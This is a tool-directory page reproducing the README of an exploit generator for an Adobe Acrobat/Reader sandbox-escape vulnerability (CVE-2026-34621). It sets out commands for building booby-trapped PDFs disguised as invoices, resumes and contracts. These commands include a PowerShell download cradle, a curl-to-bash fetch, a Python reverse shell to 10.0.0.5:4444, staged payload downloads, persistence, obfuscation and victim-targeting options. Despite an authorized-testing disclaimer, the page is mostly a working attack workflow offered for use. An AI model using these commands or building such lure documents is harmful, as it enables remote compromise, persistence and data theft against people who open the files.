Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
cve_2026_34621_advanced — A sophisticated, cross-platform exploit generator for **CVE-2026-34621** – a critical prototype pollution vulnerability in Adobe Acrobat and Reader that leads to sandbox escape and arbitrary code execution on Windows and macOS. | Kitploit
Tools/GitHubGitHub/null200ok/cve_2026_34621_advanced
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubnull200ok/cve_2026_34621_advanced

cve_2026_34621_advanced

A sophisticated, cross-platform exploit generator for **CVE-2026-34621** – a critical prototype pollution vulnerability in Adobe Acrobat and Reader that leads to sandbox escape and arbitrary code execution on Windows and macOS.

View Repository
136125 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2026-34621 Advanced Exploit Generator

Python 3.7+ License

A sophisticated, cross-platform exploit generator for CVE-2026-34621 – a critical prototype pollution vulnerability in Adobe Acrobat and Reader that leads to sandbox escape and arbitrary code execution on Windows and macOS.

⚠️ IMPORTANT DISCLAIMER
This tool is intended only for authorized security research and penetration testing.
Unauthorized use against systems you do not own or have explicit written permission to test is illegal. The author assumes no liability for misuse.


📋 Table of Contents

  • Overview
  • Features
  • Installation
  • Quick Start
  • Usage Examples
    • Windows Commands
    • macOS Commands
    • Mobile Testing
  • Command-Line Options
  • How It Works
  • Affected Versions
  • Mitigation
  • Contributing
  • License

🔍 Overview

CVE-2026-34621 is a zero-day vulnerability in Adobe Acrobat and Reader that allows an attacker to:

  1. Pollute the JavaScript object prototype within Adobe's engine.
  2. Bypass the security sandbox.
  3. Execute arbitrary system commands on the victim's machine.

This generator creates a malicious PDF file that, when opened in a vulnerable version of Adobe Reader, automatically executes a payload tailored to the victim's operating system.

Supported Target Platforms:

  • ✅ Windows (full arbitrary code execution)
  • ✅ macOS (full arbitrary code execution)
  • ❌ Android / iOS (not vulnerable – demo fallback only)

✨ Features

CategoryCapabilities
Cross‑Platform PayloadsAuto-detects OS and selects appropriate Windows or macOS command execution method.
Multiple Execution Vectorscmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS).
Staged PayloadsDownload and execute second‑stage payloads from a remote URL.
PersistenceInstall registry Run key (Windows) or LaunchAgent (macOS).
Evasion TechniquesThree levels of JavaScript obfuscation, environment keying, execution delays, polymorphic code.
Lure PDF EmbeddingMerge the exploit into a legitimate‑looking PDF (requires PyPDF2).
Multiple TriggersOpenAction, page‑open action, or document‑level JavaScript.
Comprehensive ReportingHTML, TXT, and JSON reports detailing payload configuration.

📦 Installation

1. Clone the Repository

git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit

2. (Optional) Create a Virtual Environment

python3 -m venv venv
source venv/bin/activate      # Linux/macOS
venv\Scripts\activate         # Windows

3. Install Dependencies

The core script uses only the Python standard library. For the lure PDF merging feature, install PyPDF2:

pip install PyPDF2

🚀 Quick Start

Generate a basic PDF that opens the calculator on both Windows and macOS:

python3 cve_2026_34621_advanced.py -o test.pdf

This creates:

test.pdf – The malicious PDF file.

test_report.html – Detailed HTML report.

test_report.txt – Plain text summary.

test_config.json – JSON configuration export.

💻 Usage Examples

Windows Commands

1-Scenario Command

A-Basic calc.exe popup

python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe

PowerShell reverse shell

python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""

Staged payload with persistence

python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p

Environment‑keyed (only run on "SALES-PC")

python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC

With obfuscation level 2 and 10‑second delay

python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10

macOS Commands

2-Scenario Command

Open Calculator

python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"

Download and execute script

python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"

Reverse shell via Python

python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"

Persistence via LaunchAgent

python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p

Embedding in a Lure PDF

python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen

3-Mobile Testing Note

The script itself runs on desktop (Windows/macOS/Linux) to generate the PDF. The generated PDF can be opened on Android or iOS devices, but:

Mobile versions of Adobe Acrobat Reader are not vulnerable to CVE-2026-34621.

The payload will trigger a benign demo fallback (opens a URL or shows an alert) instead of executing system commands.

📖 Command-Line Options

Option Description

-o, --output FILE Required. Output PDF filename.

--win CMD Windows command to execute (default: calc.exe).

--mac CMD macOS command to execute (default: open /System/Applications/Calculator.app).

--stage URL URL to download second‑stage payload from.

-p, --persistence Install persistence mechanism (Registry/LanchAgent).

-O, --obfuscate LEVEL JavaScript obfuscation level (0=none, 1=basic, 2=intermediate, 3=advanced).

-d, --delay SECONDS Delay execution by specified seconds.

-k, --key HOSTNAME Environment keying – only execute on matching hostname.

-l, --lure PDF Path to a legitimate PDF to use as a lure (merges exploit).

--trigger TYPE Trigger vector: openaction, pageopen, or doclevel.

--no-reports Skip generating HTML/TXT/JSON reports.

--seed N Set random seed for reproducible polymorphic generation.

⚙️ How It Works

Attack Chain

Prototype Pollution:

The embedded JavaScript modifies Object.prototype to inject malicious properties (__trusted, privileged, etc.). This confuses Adobe's JavaScript engine trust boundary.

Context Escalation

Because of the polluted prototype, the engine incorrectly treats untrusted document JavaScript as if it were running in a privileged context.

Privileged API Access

The script can now call restricted APIs such as app.launchURL, util.readFileIntoStream, and app.trustedFunction.

Sandbox Escape

These APIs allow file system access and process execution outside the Adobe sandbox.

Arbitrary Code Execution

The script executes the attacker's command using OS‑specific methods:

Windows: cmd.exe /c, PowerShell, or WScript.Shell.

macOS: Terminal.app URL handler or osascript.

Obfuscation Levels

Level Description

0 No obfuscation – plain readable JavaScript.

1 String literals converted to String.fromCharCode, variable names randomized.

2 Level 1 + dead code injection and junk comments.

3 Entire script base64‑encoded and wrapped in eval(atob(...)), then re‑obfuscated.

🛡️ Affected Versions

Product Track Vulnerable Versions Patched Version

Adobe Acrobat DC Continuous ≤ 26.001.21367 26.001.21411

Adobe Acrobat Reader DC Continuous ≤ 26.001.21367 26.001.21411

Download Tool